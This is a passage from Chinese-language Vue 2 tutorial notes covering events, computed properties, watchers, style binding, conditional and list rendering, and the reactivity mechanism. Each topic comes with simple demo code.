    ​Vue 中用到了数据代理技术,便于开发者编写代码。

    webp

    ​访问/修改 vm.name 的值相当于访问/修改 vm._data.name 的值。

    七、事件处理

    014 事件处理

    事件的基本使用:

    1. 使用 v-on:xxx@xxx 绑定事件,其中 xxx 是事件名;
    2. 事件的回调需要配置在 methods 对象中,最终会在 vm 上;
    3. methods 中配置的函数,不要用箭头函数!否则 this 就不是 vm 了;
    4. methods 中配置的函数,都是被 vue 所管理的函数,this 的指向是 vm 或组件实例对象;
    5. @click="demo"@click="demo($event)" 效果一致,但后者可以传参;

    webp

    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <!-- <button v-on:click="showInfo">点我提示信息</button> -->
    <button @click="showInfo1">点我提示信息 1(不传参)</button>
    <!-- 如果不需要获取点击事件,则不需要参数 $event -->
    <button @click="showInfo2($event, 66)">点我提示信息 2(传参)</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo1(event) {
    alert('你好啊朋友!')
    },
    showInfo2(event, number) {
    console.log(event, number)
    alert('圣光会制裁你!')
    }
    }
    })
    </script>

    015 事件修饰符 & 017 事件总结

    Vue 中的事件修饰符:

    1. prevent:阻止默认事件(常用);
    2. stop:阻止事件冒泡(常用);
    3. once:事件只触发一次(常用);
    4. capture:使用事件的捕获模式;
    5. self:只有 event.target 是当前操作的元素时才触发事件;
    6. passive:事件的默认行为立即执行,无需等待事件回调执行完毕。

    ​在 JavaScript 中,事件捕获(Event Capturing)和事件冒泡(Event Bubbling)是事件传播的两个阶段,用于描述事件在 DOM 中的传递顺序。它们分别定义了事件在触发时如何从一个元素传递到另一个元素。

    ​事件传播在 DOM 中经过以下三个阶段:

    • 捕获阶段(Capturing Phase):事件从最顶层的祖先元素(通常是 window)开始向下传递,直到目标元素。
    • 目标阶段(Target Phase):事件到达触发该事件的目标元素本身。
    • 冒泡阶段(Bubbling Phase):事件从目标元素开始向上传递,依次经过其祖先元素,直到 window
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    <style>
    * {
    margin-top: 20px;
    }
    .demo1 {
    height: 50px;
    background-color: skyblue;
    }
    .box1 {
    padding: 5px;
    background-color: skyblue;
    }
    .box2 {
    padding: 5px;
    background-color: orange;
    }
    .list {
    width: 200px;
    height: 20px;
    background-color: peru;
    overflow: auto;
    }
    li {
    height: 100px;
    }
    </style>
    </head>
    <body>
    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <!-- 阻止默认事件(常用) -->
    <a href="https://www.baidu.com" @click.prevent="showInfo">点我提示信息</a>
    <!-- 阻止事件冒泡(常用) -->
    <div class="demo1" @click="showInfo">
    <button @click.stop="showInfo">点我提示信息</button>
    </div>
    <!-- 事件只触发一次(常用) -->
    <button @click.once="showInfo">点我提示信息</button>
    <!-- 使用事件的捕获模式 -->
    <div class="box1" @click.capture="showMsg(1)">
    div1
    <div class="box2" @click="showMsg(2)">
    div2
    </div>
    </div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo(e) {
    alert('你好啊朋友!')
    },
    showMsg(msg) {
    alert(msg)
    }
    }
    })
    </script>
    </body>
    </html>
    </html>

    ​事件修饰符可以连着写,如 @click.stop.prevent 表示先阻止冒泡,再阻止默认事件。

    016 键盘事件 & 017 事件总结

    1. Vue 中常用的按键别名:

      • 回车 => enter

      • 删除 => delete(捕获“删除”和“退格”键)

      • 退出 => esc

      • 空格 => space

      • 换行 => tab

      • 上 => up

      • 下 => down

      • 左 => left

      • 右 => right

    2. Vue 未提供别名的按键,可以使用按键原始的 key 值去绑定,但注意要转为 kebab-case(短横线命名)

      • CapsLock 键应转为 caps-lock
    3. 系统修饰键(用法特殊):ctrl、alt、shift、meta

      • 配合 keyup 使用:按下修饰键的同时,再按下其他键,随后释放其他键,事件才被触发

        • @keyup.ctrl.y 必须按下并释放 Ctrl + y 才可以生效。
      • 配合 keydown 使用:正常触发事件。

    4. 也可以使用 keycode 去指定具体的按键(不推荐)

    5. Vue.config.keyCodes.自定义键名 = 键码,可以去定制按键别名

    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <input type="text" placeholder="按下回车提示输入" @keyup.enter="showInfo">
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo(e) {
    console.log(e.target.value);
    }
    }
    })
    </script>

    ​这段代码将在按下 enter 键后调用 showInfo() 以显示输入框里的值。

    八、计算属性

    018 姓名案例

    <div id="root">
    姓:<input type="text" v-model="firstName"><br/>
    名:<input type="text" v-model="lastName"><br/>
    姓名:<span>{{firstName}}-{{lastName}}</span>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    }
    })
    </script>
    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<span>{{fullName()}}</span>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    methods: {
    fullName() {
    return this.firstName + '-' + this.lastName
    }
    }
    })
    </script>

    019 计算属性

    计算属性:

    1. 定义:要用的属性不存在,要通过已有属性计算得来。
    2. 原理:底层借助了 objcet.defineproperty 方法提供的 gettersetter
    3. get() 什么时候执行?
      • 初次读取时会执行一次。
      • 当依赖的数据发生改变时会被再次调用。
    4. 优势:与 methods 实现相比,内部有缓存机制(复用),效率更高,调试方便。
    5. 备注:
      • 计算属性最终会出现在 vm 上,直接读取使用即可。
      • 如果计算属性要被修改,那必须写 set() 函数去响应修改,且 set() 中要引起计算时依赖的数据发生改变

    ​使用 computed 实现计算属性。

    <div id="root">
    姓:<input type="text" v-model="firstName"><br/>
    名:<input type="text" v-model="lastName"><br/>
    姓名:<input type="text" v-model="fullName"><br/>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    computed: {
    fullName: {
    // get() 有什么作用?当有人读取 fullName 时,get() 就会被调用,且返回值就作为 fullName 值;
    // get() 什么时候调用?
    // 1. 初次读取 fullName 时;
    // 2. 所依赖的数据发生变化时。
    get() {
    return this.firstName + '-' + this.lastName
    },
    set(value) {
    const arr = value.split('-')
    this.firstName = arr[0]
    this.lastName = arr[1]
    }
    }
    }
    })
    </script>

    020 计算属性_简写

    ​将 fullName: {get(){}}fullName(){} 简写。

    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<input type="text" v-model="fullName"><br />
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    computed: {
    fullName() {
    return this.firstName + '-' + this.lastName
    }
    }
    })
    </script>

    九、监视属性

    021 天气案例

    <div id="root">
    <h2>今天天气很{{info}}</h2>
    <!-- <button @click="isHot = !isHot">切换天气</button> -->
    <button @click="changeWeather()">切换天气</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    }
    })
    </script>

    022 监视属性

    watch 可以监听哪些属性是否被改变。


    监视属性 watch

    1. 当被监视的属性变化时,回调函数自动调用,进行相关操作
    2. 监视的属性必须存在,才能进行监视!!
    3. 监视的两种写法:
      • new Vue 时传入 watch 配置
      • 通过 v.$watch 监视
    <div id="root">
    <h2>今天天气很{{info}}</h2>
    <!-- <button @click="isHot = !isHot">切换天气</button> -->
    <button @click="changeWeather()">切换天气</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    },
    watch: {
    isHot: {
    // immediate: true, 开始时调用一次
    handler(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    }
    }
    })
    </script>

    ​也可以这么写:

    Vue.config.productionTip = false  // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    }
    })

    v.$watch('isHot', {
    // immediate: true, 开始时调用一次
    handler(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    })

    023 深度监视

    深度监视:

    1. Vue 中的 watch 默认不监测对象内部值的改变(一层)
    2. 配置 deep: true 可以监测对象内部值改变(多层)。

    备注:

    1. Vue 自身可以监测对象内部值的改变,但 Vue 提供的 watch 默认不可以
    2. 使用 watch 时根据数据的具体结构,决定是否采用深度监视。

    ​如果某个属性具有多级结构,可用如下方法监视:

    <div id="root">
    <h3>a 的值为:{{numbers.a}}</h3>
    <button @click="numbers.a++">点我让 a + 1</button>
    <h3>b 的值为:{{numbers.b}}</h3>
    <button @click="numbers.b++">点我让 b + 1</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true,
    numbers: {
    a: 1,
    b: 2
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    },
    watch: {
    'numbers.a': {
    handler(){
    console.log('a 值被改变了!')
    }
    }
    }
    })
    </script>

    ​也可通过 deep: true 开启深度监视:

    watch: {
    numbers: {
    deep: true,
    handler(){
    console.log('numbers 值被改变了!')
    }
    }
    }

    024 监视的简写形式

    watch: {
    // 简写
    isHot(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    }

    或:

    v.$watch('isHot', function(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    })

    ​这么写的代价是无法配置监视属性。

    025 watch 对比 computed

    computed 和 watch 之间的区别:

    1. computed 能完成的功能,watch 都可以完成。
    2. watch 能完成的功能,computed 不一定能完成,例如:watch 可以进行异步操作。

    两个重要的小原则:

    1. 所被 Vue 管理的函数,最好写成普通函数,这样 this 的指向才是 vm 或组件实例对象。
    2. 所有不被 vue 所管理的函数(定时器的回调函数、ajax 的回调函数等、Promise 的回调函数),最好写成箭头函数,这样 this 的指向才是 vm 或组件实例对象。

    ​使用 watch 实现姓名案例:

    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<input type="text" v-model="fullName"><br />
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三',
    fullName: '张-三'
    },
    watch: {
    firstName(val) {
    this.fullName = val + '-' + this.lastName
    },
    lastName(val) {
    this.fullName = this.firstName + '-' + val
    }
    }
    })
    </script>

    十、绑定样式

    026 绑定 class 样式

    ​绑定 class 样式:

    写法适用范围
    字符串写法样式的类名不确定,需要动态指定
    数组写法要绑定的样式个数不确定、名字也不确定
    对象写法要绑定的样式个数确定、名字也确定,但要动态决定用不用

    ​代码:

    <!DOCTYPE html>
    <html lang="en">

    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <style>
    .basic {
    width: 400px;
    height: 100px;
    border: 1px solid black;
    }

    .happy {
    border: 4px solid red;
    background-color: rgba(255, 255, 0, 0.644);
    background: linear-gradient(30deg, yellow, pink, orange, yellow);
    }

    .sad {
    border: 4px dashed rgb(2, 197, 2);
    background-color: gray;
    }

    .normal {
    background-color: skyblue;
    }

    .style1 {
    background-color: yellowgreen;
    }

    .style2 {
    font-size: 30px;
    text-shadow: 2px 2px 10px red;
    }

    .style3 {
    border-radius: 20px;
    }
    </style>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    </head>

    <body>
    <div id="root">
    <!-- 绑定 class 样式--字符串写法,适用于:样式的类名不确定,需要动态指定 -->
    <div class="basic" :class="mood" @click="changeMood">{{name}}</div><br><br>
    <!-- 绑定 class 样式--数组写法,适用于:要绑定的样式个数不确定、名字也不确定 -->
    <div class="basic" :class="classArr">{{name}}</div><br><br>
    <!-- 绑定 class 样式--对象写法,适用于:要绑定的样式个数确定、名字也确定,但要动态决定用不用 -->
    <div class="basic" :class="classObj">{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    mood: 'normal',
    classArr: ['style1', 'style2', 'style3'],
    classObj: {
    style1: false,
    style2: true
    }
    },
    methods: {
    changeMood() {
    const arr = ['happy', 'sad', 'normal']
    const index = Math.floor(Math.random() * 3)
    this.mood = arr[index]
    }
    },
    })
    </script>
    </body>

    </html>

    </html>

    ​效果:

    webp

    027 绑定 style 样式

    绑定样式:

    1. class 样式

      写法:class="xxx"xxx 可以是字符串、对象、数组。

      • 字符串写法适用于:类名不确定,要动态获取。
      • 对象写法适用于:要绑定多个样式,个数不确定,名字也不确定。
      • 数组写法适用于:要绑定多个样式,个数确定,名字也确定,但不确定用不用
    2. style 样式(较少用)
      :style="{fontsize:xxx}" 其中 xxx 是动态值。
      :style="[a,b]" 其中 ab 是样式对象。

    <!-- 绑定 style 样式--对象写法 -->
    <div class="basic" :style="styleObj">{{name}}</div><br><br>
    <!-- 绑定 style 样式--数组写法 -->
    <div class="basic" :style="styleArr">{{name}}</div><br><br>

    ​对应的 Vue 实例:

    styleObj: {
    fontSize: '40px',
    color: 'red'
    },
    styleObj2: {
    backgroundColor: 'orange'
    },
    styleArr: [this.styleObj, this.styleObj2]

    十一、条件渲染

    028 条件渲染

    条件渲染:

    1. v-if

      写法:

      • v-if="表达式"
      • v-else-if="表达式”
      • v-else="表达式"

      适用于:切换频率较低的场景。

      特点:不展示的 DOM 元素直接被移除

      注意:v-if 可以和:v-else-ifv-else 一起使用,但要求结构不能被“打断”

    2. v-show

      写法:v-show="表达式"

      适用于:切换频率较高的场景。
      特点:不展示的 DOM 元素未被移除,仅仅是使用样式隐藏掉

    3. 备注:使用 v-if 的时,元素可能无法获取到,而使用 v-show 一定可以获取到。

    <div id="root">
    <h2>当前 n 的值是 {{n}}</h2>
    <button @click="n++">点我 n + 1</button>
    <!-- 使用 v-show 做条件渲染 -->
    <h2 v-show="false">欢迎来到{{name}}</h2>
    <h2 v-show="true">欢迎来到{{name}}</h2>
    <!-- 使用 v-if 做条件渲染 -->
    <h2 v-if="false">欢迎来到{{name}}</h2>
    <h2 v-if="1 === 1">欢迎来到{{name}}</h2>
    <!-- v-if、v-else-if、v-else -->
    <div v-if="n === 1">Angular</div>
    <div v-else-if="n === 2">React</div>
    <div v-else>React</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    n: 0
    }
    })
    </script>

    十二、列表渲染

    029 列表渲染

    v-for 指令:

    1. 用于展示列表数据
    2. 语法:v-for="(item, index) in xxx" : key="yyy"
    3. 可遍历:数组、对象、字符串(较少用)、指定次数(较少用)
    <div id="root">
    <!-- 遍历数组 -->
    <h2>人员列表(遍历数组)</h2>
    <ul>
    <li v-for="(p, index) of persons" :key="index">
    {{p.name}}-{{p.age}}
    </li>
    </ul>
    <!-- 遍历对象 -->
    <h2>汽车信息(遍历对象)</h2>
    <ul>
    <li v-for="(value, k) of car" :key="k">
    {{k}}-{{value}}
    </li>
    </ul>
    <!-- 遍历字符串 -->
    <h2>测试遍历字符串</h2>
    <ul>
    <li v-for="(char, index) of str" :key="index">
    {{char}}-{{index}}
    </li>
    </ul>
    <!-- 遍历指定次数 -->
    <h2>测试遍历指定次数</h2>
    <ul>
    <li v-for="(number, index) of 5" :key="index">
    {{number}}-{{index}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    persons: [
    {id: '001', name: '张三', age: 18},
    {id: '002', name: '李四', age: 19},
    {id: '003', name: '王五', age: 20}
    ],
    car: {
    name: '奥迪 A8',
    price: 'price',
    color: '黑色'
    },
    str: 'hello'
    }
    })
    </script>

    webp

    030 key 作用与原理

    面试题:reactvue 中的 key 有什么作用?(key 的内部原理)

    1. 虚拟 DOM 中 key 的作用:key 是虚拟 DOM 对象的标识,当状态中的数据发生变化时,Vue 会根据【新数据】生成【新的虚拟 DOM】随后 Vue 进行【新虚拟 DOM】与【旧虚拟 DOM】的差异比较,比较规则如下:

    2. 对比规则:

    • 旧虚拟 DOM 中找到了与新虚拟 DOM 相同的 key

      • 若虚拟 DOM 中内容没变,直接使用之前的真实 DOM
      • 若虚拟 DOM 中内容变了,则生成新的真实 DOM,随后替换掉页面中之前的真实 DOM
    • 旧虚拟 DOM 中未找到与新虚拟 DOM 相同的 key

      创建新的真实 DOM,随后渲染到到页面。

    1. index 作为 key 可能会引发的问题:

      • 若对数据进行:逆序添加、逆序删除等破坏顺序操作

        会产生没有必要的真实 DOM 更新 ==>界面效果没问题,但效率低。

      • 如果结构中还包含输入类的 DOM:会产生错误 DOM 更新 ==> 界面有问题。

    2. 开发中如何选择 key?:

      • 最好使用每条数据的唯一标识作为 key,比如 id、手机号、身份证号、学号等唯一值。
      • 如果不存在对数据的逆序添加、逆序删除等破坏顺序操作,仅用于渲染列表用于展示,使用 index 作为 key 是没有问题的。

    webp

    webp

    031 列表过滤

    ​将过滤后的结果存在 filPersons 中,查找时在 persons 中进行,这样就不会破坏原数据。

    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ],
    filPersons: []
    },
    watch: {
    keyword: {
    immediate: true,
    handler(val) {
    this.filPersons = this.persons.filter((p) => {
    return p.name.indexOf(val) !== -1
    })
    }
    }
    }
    })
    </script>
    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ]
    },
    computed: {
    filPersons() {
    return this.persons.filter((p) => {
    return p.name.indexOf(this.keyword) !== -1
    })
    }
    }
    })
    </script>

    032 列表排序

    ​JavaScript 中 .sort()

    • 前减后,升序排序。
    • 后减前,降序排序。

    ​以此:

    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <button @click="sortType = 2">年龄升序</button>
    <button @click="sortType = 1">年龄降序</button>
    <button @click="sortType = 0">原顺序</button>
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    sortType: 0, // 0 原顺序,1 降序,2 升序
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ]
    },
    computed: {
    filPersons() {
    const arr = this.persons.filter((p) => {
    return p.name.indexOf(this.keyword) !== -1
    })
    // 判断一下是否需要排序
    if (this.sortType) {
    arr.sort((p1, p2) => {
    return this.sortType === 1 ? p2.age - p1.age : p1.age - p2.age
    })
    }

    return arr
    }
    }
    })
    </script>

    033 更新时的一个问题 & 034 Vue 监测数据的原理_对象

    Vue 中监测数据变化的核心机制是其响应式系统,它通过 数据劫持依赖收集 实现对数据变化的侦测和响应式更新。以下是其背后的主要原理:


    1. 数据劫持(Object.defineProperty 或 Proxy)

    Vue 2 使用 Object.defineProperty,Vue 3 则切换到更强大的 Proxy

    Vue 2 中的实现:
    • 使用 Object.defineProperty 来拦截对象属性的 读取设置 操作。
    • 对于每个属性,定义了 gettersetter 方法:
      • getter:在属性被访问时触发,进行依赖收集。
      • setter:在属性被修改时触发,通知依赖更新。
    局限性:
    • 只能劫持对象的已有属性,新增属性或删除属性不会触发响应式(需要使用 Vue.set)。
    • 对数组的原生方法(如 pushsplice)需要特殊处理,通过重写这些方法实现响应式。
    Vue 3 中的优化:
    • 使用 Proxy,可以直接监听对象的所有操作(包括新增、删除属性和数组索引的修改)。
    • 更加灵活、性能更高,解决了 Vue 2 的一些局限性。

    2. 依赖收集

    Vue 的响应式系统通过依赖收集和发布订阅模式实现。

    关键组件:
    • Watcher
      • 每个组件或计算属性都有一个 Watcher 实例,负责记录对响应式数据的依赖。
      • 当依赖的数据发生变化时,Watcher 会被触发更新。
    • Dep(Dependency)
      • 一个依赖管理器,用来保存所有依赖某个响应式数据的 Watcher
      • 当数据发生变化时,Dep 会通知相关的 Watcher 进行更新。
    工作流程:
    1. 数据被访问时**(通过 getter)**,当前活动的 Watcher 会被添加到该数据的依赖列表中。
    2. 数据被修改时**(通过 setter)**,触发对应的 Dep 通知所有依赖更新。

    3. 虚拟 DOM 与批量更新

    Vue 使用虚拟 DOM 结合异步队列优化更新流程:

    • 当数据变化时,setter 通知依赖更新,但不会立即更新 DOM。
    • Vue 会将更新操作放入队列中,并在下一个事件循环中批量更新,避免频繁的 DOM 操作。

    4. 响应式原理的应用

    响应式系统支持以下特性:

    • 双向绑定:通过 v-model 实现表单与数据的同步。
    • 计算属性:基于依赖的变化自动计算。
    • 侦听器:通过 watch 监控特定数据的变化并执行回调。

    总结

    Vue 的响应式系统通过以下机制协作:

    1. 使用数据劫持技术(Vue 2:Object.defineProperty,Vue 3:Proxy)。
    2. 实现依赖收集和发布订阅模式。
    3. 结合虚拟 DOM 和异步更新队列,确保性能和开发体验。

    这种设计不仅高效,而且为开发者屏蔽了复杂性,使得数据绑定和状态管理变得直观。

    035 Vue.set() 方法

    ​**一个属性必须有 get()set() 才能被 Vue 跟踪到!**如果要给 data 中的一个对象加一个属性,可以使用 Vue.set() 来实现(这样才会有 get()set()):

    <div id="root">
    <h1>学生信息</h1>
    <button @click="addSex">添加一个性别属性,默认值是男</button>
    <h2>姓名:{{student.name}}</h2>
    <h2 v-if="student.sex">性别:{{student.sex}}</h2>
    <h2>年龄:真实{{student.age.rAge}},对外{{student.age.sAge}}</h2>
    <h2>朋友们</h2>
    <ul>
    <li v-for="(f, index) in student.friends" :key="index">
    {{f.name}}-{{f.age}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    student: {
    name: 'tom',
    age: {
    rAge: 40,
    sAge: 29,
    },
    friends: [
    {name: 'jerry', age: 35},
    {name: 'tony', age: 36}
    ]
    }
    },
    methods: {
    addSex() {
    // Vue.set(this.student, 'sex', '男')
    this.$set(this.student, 'sex', '男')
    }
    }
    })
    </script>

    036 Vue 检测数据的原理_数组

    ​直接操作数组的索引值将不跟踪!Vue 只有在使用数组有关的下列函数,才会检测到数组被改变,从而跟踪到(用到了包装技术):

    在 Vue 2 中,数组的更新检测是有限制的。由于 JavaScript 的数组特性,Vue 无法侦听某些直接的数组操作,因此提供了一些内置的方法来实现响应式更新。这些方法对 Vue 2 的响应式系统进行了增强,确保数据变更能被正确地检测到和响应。

    Vue 2 对数组的更新检测提供了以下七个方法,这些方法都是对原生数组方法的包装:


    1. push()

    • 功能:向数组末尾添加一个或多个元素。

    • 触发更新:响应式地添加新元素并触发视图更新。

      let vm = new Vue({
      data: {
      items: [1, 2, 3]
      }
      });

      vm.items.push(4); // 响应式更新视图

    2. pop()

    • 功能:移除数组末尾的元素。
    • 触发更新:响应式地移除最后一个元素并触发视图更新。
      vm.items.pop(); // 移除 3,视图更新

    3. shift()

    • 功能:移除数组开头的元素。
    • 触发更新:响应式地移除第一个元素并触发视图更新。
      vm.items.shift(); // 移除 1,视图更新

    4. unshift()

    • 功能:向数组开头添加一个或多个元素。
    • 触发更新:响应式地在开头添加新元素并触发视图更新。
      vm.items.unshift(0); // 添加 0,视图更新

    5. splice()

    • 功能:添加、替换或删除数组中的元素。
    • 触发更新:响应式地修改数组并触发视图更新。
      vm.items.splice(1, 1, 'a'); // 替换索引 1 的元素为 'a'

    6. sort()

    • 功能:对数组进行排序。
    • 触发更新:响应式地对数组排序并触发视图更新。
      vm.items.sort(); // 按字典序排序,视图更新

    7. reverse()

    • 功能:反转数组顺序。
    • 触发更新:响应式地反转数组并触发视图更新。
      vm.items.reverse(); // 反转数组顺序,视图更新

    注意事项

    1. 对数组的直接索引赋值不会触发更新

      • Vue 2 无法侦测类似 vm.items[0] = 10 这样的操作。
      • 解决办法:使用 Vue.set()
        Vue.set(vm.items, 0, 10); // 响应式更新索引 0 的值
    2. 数组长度的直接修改不会触发更新

      • 类似 vm.items.length = 2 的操作不会触发响应式更新。
      • 避免直接修改数组长度。

    通过这些方法,Vue 2 能够对数组的变更进行有效的监听,并自动触发相关的视图更新。这种响应式机制是 Vue 2 的核心功能之一。

    ​也可用 Vue.set() 改变数组的值来更新数组。

    Vue.set(vm._data.student.hobby, 1, '打台球')

    037 总结 Vue 监视数据

    ​Vue 监视数据的原理:

    1. Vue 会监视 data 中所有层次的数据;

    2. 如何监测对象中的数据?

      通过 setter 实现监视,且要在 new Vue 时就传入要监测的数据。

      • 对象中后追加的属性,Vue 默认不做响应式处理
      • 如需给后添加的属性做响应式,请使用如下 API:
        • Vue.set(target, propertyName/index, value)
        • wm.$set(target, propertyName/index, value)
    3. 如何监测数组中的数据?

      通过包裹数组更新元素的方法实现,本质就是做了两件事:

      • 调用原生对应的方法对数组进行更新。
      • 重新解析模板,进而更新页面。
    4. 在 Vue 修改数组中的某个元素一定要用如下方法:

      • 使用这些 API:push()pop()shift()unshift()splice()sort()reverse()
      • Vue.set()vm.$set()

    ​特别注意:Vue.set()vm.$set() 不能给 vmvm根数据对象添加属性!


    <div id="root">
    <h1>学生信息</h1>
    <button @click="student.age++">年龄 +1 岁</button><br>
    <button @click="addSex">添加性别属性,默认值:男</button><br>
    <button @click="student.sex = '未知'">修改性别</button><br>
    <button @click="addFriend">在列表首位添加一个朋友</button><br>
    <button @click="updateFirstFriendName">修改第一个朋友的名字为:张三</button><br>
    <button @click="addHobby">添加一个爱好</button><br>
    <button @click="updateHobby">修改第一个爱好为:开车</button><br>
    <button @click="removeSmoke">过滤掉爱好中的抽烟</button><br>
    <h3>姓名:{{student.name}}</h3>
    <h3>年龄:{{student.age}}</h3>
    <h3 v-if="student.sex">性别:{{student.sex}}</h3>
    <h3>爱好:</h3>
    <ul>
    <li v-for="(h, index) in student.hobby" :key="index">
    {{h}}
    </li>
    </ul>
    <h3>朋友们:</h3>
    <ul>
    <li v-for="(f, index) in student.friends" :keys="index">
    {{f.name}}--{{f.age}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    student: {
    name: 'tom',
    age: 18,
    hobby: ['抽烟', '喝酒', '烫头'],
    friends: [
    {name: 'jerry', age: 35},
    {name: 'tony', age: 36}
    ]
    }
    },
    methods: {
    addSex() {
    this.$set(this.student, 'sex', '男')
    },
    addFriend() {
    this.student.friends.unshift({name: 'mike', age: 18})
    },
